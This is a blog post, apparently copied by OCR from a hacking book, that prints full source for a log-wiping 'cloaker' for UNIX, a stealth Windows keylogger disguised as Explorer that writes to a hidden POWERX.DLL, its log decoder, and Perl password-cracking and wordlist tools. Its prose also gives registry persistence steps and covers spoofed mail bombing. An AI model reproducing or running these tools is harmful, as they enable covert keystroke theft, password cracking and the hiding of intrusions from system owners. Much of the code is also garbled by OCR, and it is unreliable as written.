Sunday, December 6, 2009

Covering Keylogging Trails

Hackers commonly use cloaking software to completely cover their tracks from a successful intrusion. Programs in this category are designed to seek out and destroy logs, logger files, stamps, and temp files. One example is cloaker.c, originally by hacker guru Wintermute. This program, shown next, totally wipes all presence on a UNIX system.



cloaker.c



#include

#include

#include

#include

#include

main(argc, int char

argv) argc; *argv[];

{

char *name; struct utmp u; struct lastlog



l;

int int int int

fd;

i = 0; done = size;



0;



if (argc != 1) {

if (argc >= 1 && strcmp(argv[1], "cloakme") == 0) { printf("You are now cloaked\n"); goto start;

}

else {

printf("close successful \n");

exit(0);

}



}

else {

printf("usage: close [file to close] \n");

exit(1);



start:

name = (char *)(ttyname(0)+5); size = sizeof(struct utmp);



fd = open("/etc/utmp", O_RDWR);

if (fd < 0)

perror("/etc/utmp"); else {

while ((read(fd, &u, size) == size) && !done) { if (!strcmp(u.ut_line, name)) { done = 1;

memset(&u, 0, size); lseek(fd, -1*size, SEEK_CUR); write(fd, &u, size); close(fd);

}

}

}



size = sizeof(struct lastlog);

fd = open("/var/adm/lastlog", O_RDWR);

if (fd < 0)

perror("/var/adm/lastlog"); else {

lseek(fd, size*getuid(), SEEK_SET); read(fd, &l, size); l.ll_time = 0;

strncpy(l.ll_line, "ttyq2 ", 5); gethostname(l.ll_host, 16); lseek(fd, size*getuid(), SEEK_SET); close(fd); }

}



It is important to keep in mind that an effective hidden Windows keylogger, will, for example, take advantage of the fact that all user programs in Windows share a single interrupt descriptor table (IDT). This implies that if one user program patches a vector in the IDT, then all other programs are immediately affected. The best example is one submitted from a Phrack posting by security enthusiast markj8, revamped and reposted by the hacker guru known as mindgame.



This method will create a hidden file in the \WINDOWS\SYSTEM directory called POWERX.DLL, and record all keystrokes into it using the same encoding scheme as Doc Cypher's keyboard keylogger KEYTRAP3.COM program for DOS. This means that you can use the same conversion program, CONVERT3.C, to convert the scan codes in the log file as ASCII. If the log file is larger than 2 MB when the program starts, it will be deleted and re-created with a zero length. When you press Ctrl-Alt-Del (in Windows 9x) to look at the Task List, W95Klog will show up as Explorer. This can be modified with any hex editor or by changing values in the .DEF file and recompiling.



To cause the target machine to run W95Klog every time it starts Windows, you can:



• Edit win.ini. Modify the [windows] section to read: run=WHLPFFS.EXE or some other confusing name. This will cause a nasty error message if WHLPFFS.EXE can't be found. This advantage of this method is that it can be performed over the network via "remote administration," without the need for both computers to be running "remote Registry service."

• Edit the Registry key. Revise the HKEY_LOCAL_MACHINE/SOFTWARE/

Microsoft/Windows/CurrentVersion/Run key, and create a new key with a string value of WHLPFFS.EXE. This is the preferred method because it is less likely to be stumbled upon by the average user, and Windows continues without complaint if the executable can't be found. The log file can be retrieved via the network even when it is still open for writing by the logging program. This is very convenient to the aggressive hacker.



The following program, convert.c, is an example of a stealth keylogger:



convert.c



// Convert v3.0

// Keytrap logfile converter.

// By dcypher



#include



#define MAXKEYS 256 #define WS 128



const char *keys[MAXKEYS];

void main(int argc,char *argv[])

{

FILE *stream1; FILE *stream2;



unsigned int Ldata,Nconvert=0,Yconvert=0; char logf_name[100],outf_name[100];



//



// HERE ARE THE KEY ASSIGNMENTS !!

//

// You can change them to anything you want.

// If any of the key assignments are wrong, please let

// me know. I havn't checked all of them, but it looks ok.

//

// v--- Scancodes logged by the keytrap TSR // v--- Converted to the string here



keys[1]


— !! !! .

/

keys[2]


= "1";

keys[3]


= "2";

keys[4]


= "3";

keys[5]


= "4";

keys[6]


= "5";

keys[7]


= "6";

keys[8]


= "7";

keys[9]


= "8";

keys[10]


= "9";

keys[11]


= "0";

keys[12]


= "-";

keys[13]


r



keys[


44] =


"z"

keys


45] =


"x"

keys


46] =


"c"

keys


47] =


"v"

keys


48] =


"b"

keys


49] =


"n"

keys


50] =


"m"

keys


51] =


f

keys


52] =




keys


53] =


"/"

keys


54] =


"";

r

keys


55] =




keys


56] =


"";

r

keys[


57] =




// right shift - not logged by the tsr

// and not converte



// now show with shift key

// the TSR adds 128 to the scancode to show shift/caps



keys[1+WS] = "["; /* was "" but now fixes AZ problem */

keys[


[2+WS]


=


"!";

keys


;3+WS]


=


"@";

keys


;4+WS]


=


"#";

keys


;5+ws]


=


"$";

keys


; 6+ws]


=


n a ft .

o /

keys


;7+ws]


=


"A".

keys


;8+ws]


=


"&";

keys


[9+WS]


=




keys


;10+ws]


=


"(";

keys


;h+ws]


=


")";

keys


;12+ws]


=




keys


;13+ws]


=


"+";

keys


;14+ws]


=


"";

r

keys


;15+ws]


=


"";

r

keys[16+WS]


=


"Q";

keys


[17+WS]


=


"W";

keys


;18+ws]


=


"E";

keys


;19+ws]


=


"R";

keys


;20+ws]


=




keys


;21+ws]


=


"Y"«

keys


;22+WS]


=


"U";

keys


;23+WS]


=


"I";

keys[24+WS]


=


"O";

keys


[25+WS]


=


"P".

keys


;26+WS]


=


"{";

keys


;27+WS]


=


"}";

keys


;28+WS]


=


"";

r

keys


;29+WS]


=


"";

r

keys[


;30+ws]


=


"A";







keys[31+WS] = "S";

keys[32+WS] = "D";

keys[33+WS] = "F";

keys[34+WS] = "G";

keys[35+WS] = "H";

keys[36+WS] = "J";

keys[37+WS] = "K";

keys[38+WS] = "L";

keys[39+WS] =

keys[40+WS] = "\"";

keys[41+WS] =

keys[42+WS] = ""; // left shift - not logged by the tsr

keys[43+WS] = "|"; // and not convert

ed

keys[44+WS] = "Z";

keys[45+WS] = "X";

keys[46+WS] = "C";

keys[47+WS] = "V";

keys[48+WS] = "B";

keys[49+WS] = "N";

keys[50+WS] = "M";

keys[51+WS] = "<";



"?"

""; "";

keys[52+WS] keys[53+WS]

keys[54+WS] = ""; //

keys[55+WS]



keys[56+WS] keys[57+WS]



right shift

not logged by the tsr

and not convert



printf("\n"); printf("Convert v3.0\n");

// printf("Keytrap logfile converter.\n"); // printf("By dcypher \n\n");

printf("Usage: CONVERT infile outfile\n"); printf("\n");



if (argc==3)



strcpy(logf_name,argv[1]); strcpy(outf_name,argv[2]);

}

else {

printf("Enter infile name: ");

scanf("%99s",&logf_name); printf("Enter outfile name: scanf("%99s",&outf_name); printf("\n");

}



stream1=fopen(logf_name,"rb");

stream2=fopen(outf_name,"a+b");

if (stream1==NULL || stream2==NULL)

if (stream1==NULL)

printf("Error opening: %s\n\a",logf_name);

else

printf("Error opening: %s\n\a",outf_name);

fseek(stream1,0L,SEEK_SET);

printf("Reading data from: %s\n",logf_name); printf("Appending information to.. : %s\n",outf_name





while (feof(stream1)==0) {

Ldata=fgetc(stream1);



if (Ldata>0 && Ldata<186)



WS)



fputs(keys[Ldata],stream2);

r r







fputs(keys[Ldata],stream2);



}

else {



fflush(stream2); printf("\n\n"); printf("Data converted... .: %i\n",Yconvert); printf("Data not converted: %i\n",Nconvert);



printf("\n");

printf("Closeing infile: %s\n",logf_name); printf("Closeing outfile: %s\n",outf_name); fclose(stream1); fclose(stream2);

}

The convert.c requires W95Klog.c, shown next. W95Klog.c



/*

W95Klog.C Windows stealthy keylogging program

*/ /*

Change newint9() for your compiler *

Captures ALL interesting keystrokes from WINDOWS applications

but NOT from DOS boxes.

Tested OK on WFW 3.11 and Win9x.

*/



#include // Inc Mods

//#define LOGFILE "-473C96.TMP" #define LOGFILE "POWERX.DLL"

M

#define LOGMAXSIZE 2097152 //Name of log file in WINDOWS\TEMP //Name of log file in WINDOWS\SYSTE



//Max size of log file (2Megs)



#define HIDDEN 2

#define SEEK END 2

#define NEWVECT 018h

some

// "Unused" int that is used to call old

// int 9 keyboard routine.

// Was used for ROMBASIC on XT's

// Change it if you get a conflict with



// very odd program. Try 0f9h.



Global Variables in DATA SEGment ****************/



HWND hwnd; // used by newint9()

unsigned int offsetint; // old int 9 offset

unsigned int selectorint; // old int 9 selector

unsigned char scancode; // scan code from keyboard



//WndProc

char sLogPath[160]; int hLogFile; long lLogPos; char sLogBuf[10];



//WinMain

char szAppName[]="Explorer"; MSG msg; WNDCLASS wndclass;

void interrupt newint9(void) //This is the new int 9 (keyboard) co de

// It is a hardware Interrupt Service Routine. (IS

R) {

scancode=inportb(0x60);

if((scancode<0x40)&&(scancode!=0x2a)) {

if(peekb(0x0040, 0x0017)&0x4 0) { //if CAPSLOCK is active // Now we have to flip UPPER/lower state of A-Z only! 16-25,30­38,44-50

if(((scancode>15)&&(scancode<26))||((scancode>29)&&(scancode<39

))||

((scancode>43)&&(scancode<51))) //Phew! scancodeA=128; //bit 7 indicates SHIFT state to CONVERT.C pro



} //if CAPSLOCK

if(peekb(0x0040, 0x0017)&3) //if any shift key is pressed...

scancodeA=128; //bit 7 indicates SHIFT state to CONVERT.C pro

gram

if(scancode==26) //Nasty AZ bug in convert program

scancode=12 9; //New code for "["



//Unlike other Windows functions, an application may call PostMes sage

// at the hardwareinterrupt level. (Thankyou Micr$oft!) PostMessage(hwnd, WM_USER, scancode, 0L); //Send scancode to WndP roc()

} //if scancode in range



asm {


//This

pop


bp

pop


di

pop


si

pop


ds

pop


es

pop


dx

pop


cx

pop


bx

pop


ax

int


NEWVECT

iret

}




}//end newint9

is very compiler specific, & kinda ugly!

// Call the original int 9 Keyboard routine // and return from interrupt



//This is the "callback" function that handles all messages to our "window"

//



long FAR PASCAL WndProc(HWND hwnd,WORD message,WORD wParam,LONG lPa ram) {



//asm int 3; //For Soft-ice debugging

//asm int 18h; //For Soft-ice debugging



switch(message) {

case WM_CREATE: // hook the keyboard hardware interupt asm {

pusha push es push ds

// Now get the old INT 9 vector and save it.

mov al,9

mov ah,35h // into ES:BX

int 21h

push es pop ax

mov offsetint,bx // save old vector in data segment mov selectorint,ax // /

mov dx,OFFSET newint9 // This is an OFFSET in the CODE se

gment push cs

pop ds // New vector in DS:DX

mov al,9 mov ah,25h

int 21h // Set new int 9 vector

pop ds // get data seg for this program

push ds

// now hook unused vector

// to call old int 9 routine

mov dx,offsetint mov ax,selectorint mov ds,ax mov ah,25h

mov al,NEWVECT int 21h

// Installation now finished

pop ds pop es popa

} // end of asm //Get path to WINDOWS directory

if(GetWindowsDirectory(sLogPath,150)==0) return 0;



//Put LOGFILE on end of path strcat(sLogPath,"\\SYSTEM\\"); strcat(sLogPath,LOGFILE); do {

// See if LOGFILE exists hLogFile=_lopen(sLogPath,OF_READ); if(hLogFile==-1) { // We have to Create it hLogFile=_lcreat(sLogPath,HIDDEN);



if(hLogFile==-1) return 0; //Die quietly if can't create

LOGFILE

}

_lclose(hLogFile);



// Now it exists and (hopefully) is hidden. . hLogFile=_lopen(sLogPath,OF_READWRITE); //Open for business

!

if(hLogFile==-1) return 0; //Die quietly if can't open LOGFILE

lLogPos=_llseek(hLogFile,0L,SEEK_END); //Seek to the end of

the

file

if(lLogPos==-1) return 0; //Die quietly if can't seek to end

if(lLogPos>LOGMAXSIZE) { //Let's not fill the harddrive...

_lclose(hLogFile);

_chmod(sLogPath,1,0);

if(unlink(sLogPath)) return 0; //delete or die } //if file too big

} while(lLogPos>LOGMAXSIZE);

break;



case WM_USER: // A scan code...

*sLogBuf=(char)wParam; _write(hLogFile,sLogBuf,1); break;

case WM_ENDSESSION: case WM_DESTROY:

asm{ // Is windows "restarting" ? // Or are we being killed ?



push


dx

push


ds

mov


dx,offsetint

mov


ds,selectorint

mov


ax,2509h

int


21h //point

pop


ds

pop


dx



}

_lclose(hLogFile); PostQuitMessage(O); return(O); } //end switch



//This handles all the messages that we don't want to know abo



return DefWindowProc(hwnd,message,wParam,lParam); } //end WndProc





int PASCAL WinMain (HANDLE hInstance, HANDLE hPrevInstance,

LPSTR lpszCmdParam, int nCmdShow)

{



if (!hPrevInstance) { //If there is no previous instance runn

ing.





ssages

wndclass.style wndclass.lpfnWndProc





wndclass.cbClsExtra

wndclass.cbWndExtra

wndclass.hInstance

wndclass.hIcon

wndclass.hCursor

wndclass.hbrBackground

wndclass.lpszClassName

CS_HREDRAW | CS_VREDRAW;

WndProc; //function that handles me // for this window class

O; O;

hInstance;

NULL; NULL; NULL;

szAppName;



RegisterClass (&wndclass);



hwnd = CreateWindow(szAppName, //Create a window

szAppName, //window caption

WS_OVERLAPPEDWINDOW, //window style

CW_USEDEFAULT, //initial x position

CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT,

NULL, NULL,

hInstance,

NULL);

//initial y position //initial x size //initial y size //parent window handle //Window Menu handle //program instance handle //creation parameters



//ShowWindow(hwnd,nCmdShow) //UpdateWindow(hwnd);

//We don't want no // stinking window!



while (GetMessage(&msg,NULL,0,0)) { TranslateMessage(&msg); DispatchMessage(&msg); }

}//if no previous instance of this program is running.
return msg.wParam; //Program terminates here after falling out
} //End of WinMain of the while() loop.



Mail Bombing, Spamming, and Spoofing



Mail bombs are email messages used to crash a recipient's electronic mailbox, or to spam by sending unauthorized mail using a target's SMTP gateway. Mail bombs can exist in the form of one email message with huge files attached or thousands of e-messages with the intent to flood a mailbox and/or server. For example, there are software programs that will generate thousands of email messages, dispatching them to a user's mailbox, thereby crashing the mail server or restraining the particular target as it reaches its default limit.

Mail spamming is another form of pestering; it is an attempt to deliver an e-message to someone who would not otherwise choose to receive it. The most common example is commercial advertising. Mail spamming engines are offered for sale on the Internet, with hundreds of thousands of email addresses currently complementing the explosive growth of junk mail. It is common knowledge among hackers that unless the spam pertains to the sale of illegal items, there is almost no legal remedy for it.



Other widespread cases include email fraud, which involves an attacker who spoofs mail by forging another person's email address in the From field of an email message (shown in Figure 8.5), then sending out a mass emailing instructing recipients to ''Reply" to that victim's mailbox for more information, and so on. Currently, ISPs are on the lookout for mail fraud bombers, as they have been known to disrupt the services of entire networks.



Most email bombers claim their mechanisms protect the send with anonymity. You will come to realize that it can be difficult to spoof these messages. You will also realize that most of those email bombers come with a list of SMTP servers that currently do not log IP addresses. In a nutshell, this is how most Windows-based email bombers send spoofed emails.



Accordingly, hackers who wish to spoof emails use programs such as Avalanche (or Mailflash in DOS mode), by using a server that does not log IP. Up Yours (shown in Figure 8.6) and Avalanche are programs used to bomb someone's email address. They were made with dual objectives in mind: anonymity and speed. On average, Avalanche can, for example, send about 20 emails in five to seven seconds, using five clones running on only a 28.8 K connection. What's more, these programs can generate fake mail headers that help cover up the attack.



The Bombsquad utility was developed to protect against mail bombs and spamming, though it was designed primarily to address mail bombing. The software enables you to delete the email bombs, while retrieving and saving important messages. It can be used on any mailbox that supports the standard POP3 protocol. That said, be aware that phony compilations of Bomb-

squad have been floating around that implement remote-access control Trojans to cause far worse a fate than mail bombing. Reportedly, these daemons have come with the following filenames: squad1.zip, squad.zip, bomsq.zip, and bmsquad.rar.



Hacker's For more information on mail bomb countermeasures, check out Hack Attacks Nate^* Denied and visit the Computer Incident Advisory Capability (CIAC) Information Bulletin at http://ciac.llnl.gov/ciac/bulletins/i-005c .shtml.

Password Cracking



Forget your password? Have your passwords been destroyed? Need access to password-protected files or systems? Did certain of your former employees leave without unprotecting their files? Or do you simply want to learn how hackers gain access to your network, system, and secured files?



In a typical computer system, each user has one fixed password until he or she decides to change it. When the password is typed in, the computer's authentication kernel encrypts it, translates it into a string of characters, then checks it against the long list of encrypted passwords. Basically, this list is a password file stored in the computer. If the authentication modules find an identical string of characters, paired with the login, it allows access to the system. For obvious reasons, then, hackers, who want to break into a system and gain specific access clearance typically target this password file. Depending on the configuration, if hackers have achieved a particular access level, they can take a copy of the file with them and run a password-cracking program to translate those characters back into the original password.



Fundamentally, a password-cracking program encrypts a long list of character strings, such as all words in a dictionary, and checks it against the encrypted file of passwords. If it finds even one match, the intruder has gained access to the system. This sort of attack does not require a high degree of skill, hence, many types of password cracking programs are available on the Internet. Some systems can defend against cracking programs by keeping the password file under tight security. The bigger problem, however, is sniffers (described later in this chapter).



Decrypting versus Cracking



Contrary to popular belief, UNIX passwords are difficult to decrypt when encrypted with a one-way algorithm. The login program encrypts the text entered at the password prompt and compares that encrypted string against the encrypted form of the password. Password-cracking software uses wordlists, each word in the wordlist is encrypted, and the results are compared to the encrypted form of the target password. One of the most common veteran cracking programs for UNIX passwords is xcrack.pl by hacker guru manicx, shown next.



xcrack.pl



# start xcrack.pl



#system("cls"); # This will clear the terminal/DOS screen

# Then stick this info on the screen

print ("\n \t\t ");

print ("\n \t\t\t Xcrack V1.00");

print ("\n \t\thttp://www.infowar.co.uk/manicx");

print ("\n \t\t \n");



if ($#ARGV < 1) {



usage(); # Print simple statement how to use program if no argume nts exit;

}

$passlist $wordlist

$ARGV[0]; # Our password File

$ARGV[1]; # Our word list

Main Start

getwordlist(); # getting all words into array

getpasslist(); # getting login and password

print ("\n\tFinished - ", $wordlist, " - Against - ", $passlist);

#

sub getpasslist{

open (PWD, $passlist) or die (" No Good Name for password File ", $ passlist, "\n"); while ()

{

($fname, $encrypted, $uid, $gid, $cos , $home, $shell) = split (

/:/);

if ($encrypted eq "\*") # Check if the account is Locked

{

print "Account :", $fname, " \t

Disabled\n";

next; # Skip to next read

}

if ($encrypted eq "x") # Check if the account is Locked

{

print "Account :", $fname, " \t

Disabled\n";

next; # Skip to next read

}

if ($encrypted eq "") # Check if the account has No Passwo

rd

{

print "Account :", $fname, " \t

No Password\n";

next; # Skip to next read

}

enccompare(); # Call on next Sub

}

close (PWD); #closes the password file

}

#

sub getwordlist{

open (WRD, $wordlist) or die (" No Good Name for wordfile ", $wordl

ist, "\n");

while () {

@tmp_array = split; Getting the entire contents of

our

push @word_array, [@tmp_array]; # word file and stuffing it

in here

}

close (WRD); #closes the wordlist

}



#

sub enccompare{

for $password ( @word_array)

{ $encword = crypt (@$password[0], $encrypted); # encrypt ou

r word

with the same salt

if ($encword eq $encrypted) # as the encr

ypted password

{

print "Account :",$fname, " \t \aPassword : ",

@$password[O], "\n";

last; # Print the account name and password if broke

n

then break loop }

}

}

#

sub usage { print "usage = perl xcrack.pl PASSWORDFILE WORDFILE\n";

}

# End xcrack.pl # simple usage if no #ARGV's To run xcrack, use the following command:



perl xcrack.pl PASSWORDFILE WORDFILE



The latest Perl engine is available at www.Perl.com. This program must be executed with a word file or dictionary list (one is available on the CD bundled with this book). To create a password file with custom input, execute crypt.pl, as shown here:



crypt.pl



# Usage "Perl crypt.pl username password uid gid cos home



# start crypt.pl

if ($#ARGV < 1) {

usage();

exit;

}

$file = "password"; $username = $ARGV[O]

$password = $ARGV[1] $uid = $ARGV[2]; $gid = $ARGV[3]; $cos= $ARGV[4]; $home= $ARGV[5]; $shell= $ARGV[6];



just supplying variable with filename

carries name

carries unencrypted password

uid

gid

cos

home dir

shell used

up using :

":", $uid, $shell, "\n";

# encrypt's the password Password File\n"); #o



close (PWD); #closes the file

print "Added ok";

sub usagef

print "\nUsage perl crypt.pl username password uid gid cos home she

ll\n";

}

End crypt.pl



The last module in this Perl series is used for creating wordlists using random characters, shown here:



if ($#ARGV < 1) {

usage(); #If there are no arguments then print the usag

e

exit;

}



$word = $ARGV[0];

$many = $ARGV[1];

srand(time);

an array of the random characters we want to produce

remove any you know are not in the password



@c=split(/ */,

"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"); open (CONF, ">$word") or die ("\nFile Error With Output File\n");

we will repeat the following lines $many times i will be splittin

g

down the @c array with caps in 1, symbols in 1, lowercase in 1 an

d

numbers in 1.



for($i=0; $i <$many; $i +=1)

{

print CONF $c[int(rand(62))], $c[int(rand(62))], $c[int(rand(62

))],

$c[int(rand(62))], $c[int(rand(62))], $c[int(rand(62))]

,

$c[int(rand(62))], $c[int(rand(62))];

print CONF "\n";

}

sub usage {

print "\n\tusage = perl wordlist.pl OUTPUTFILE NumberOfWord

s \n";

}

In the next version I want to be able to give templates as an inp

ut

and build all the combinations in between i.e. the password start s

with "John" and there are 8 characters and none are numbers or

uppercase so we can input "john"llll ..

Below will produce words like bababa99 this was done and can be

rearranged a bit as you need before the next version



@c=split(/ */, "bcdfghjklmnpqrstvwxyz");

@v=split(/ */, "aeiou");

{

print CONF $c[int(rand(21))], $v[int(rand(5))],



$c[int(rand(21))], $v[int(rand(5))],

$c[int(rand(21))], $v[int(rand(5))],

int(rand(10)), int(rand(10));

print CONF "\n";

}

Password cracking in Windows is commonly achieved using the revision of UnSecure (see Figure 8.7), a program hackers use to exploit flaws with current networking and Internet security. This program is able to manipulate possible password combinations to pinpoint the user's password. Currently,

UnSecure can break into most Windows 9x, Windows NT, Mac, UNIX, and other OS servers, with or without a firewall. The software was designed to be used over an existing network connection, but it is able to work with a dial-up connection as well. On a Pentium 233, UnSecure will go through a 98,000 word dictionary in under five minutes when attacking locally.

UnSecure uses two password-cracking methods: a dictionary attack and a brute-force attack. The dictionary attack compares against a file containing all of the words and combinations you choose, separated by spaces, carriage returns, linefeeds, and so on. The brute-force method allows you to try all possible password combinations using the characters you specify (a-z, A-Z, 0-9, and special).



Hacker's Password shadowing is a security measure whereby the encrypted password field of Mate*1'* /etc/passwd is replaced with a special token; then the encrypted password is stored in a separate file. To defeat password shadowing, hackers write programs that use successive calls to getpwent( ) to forcefully obtain the password file.

No comments:

Post a Comment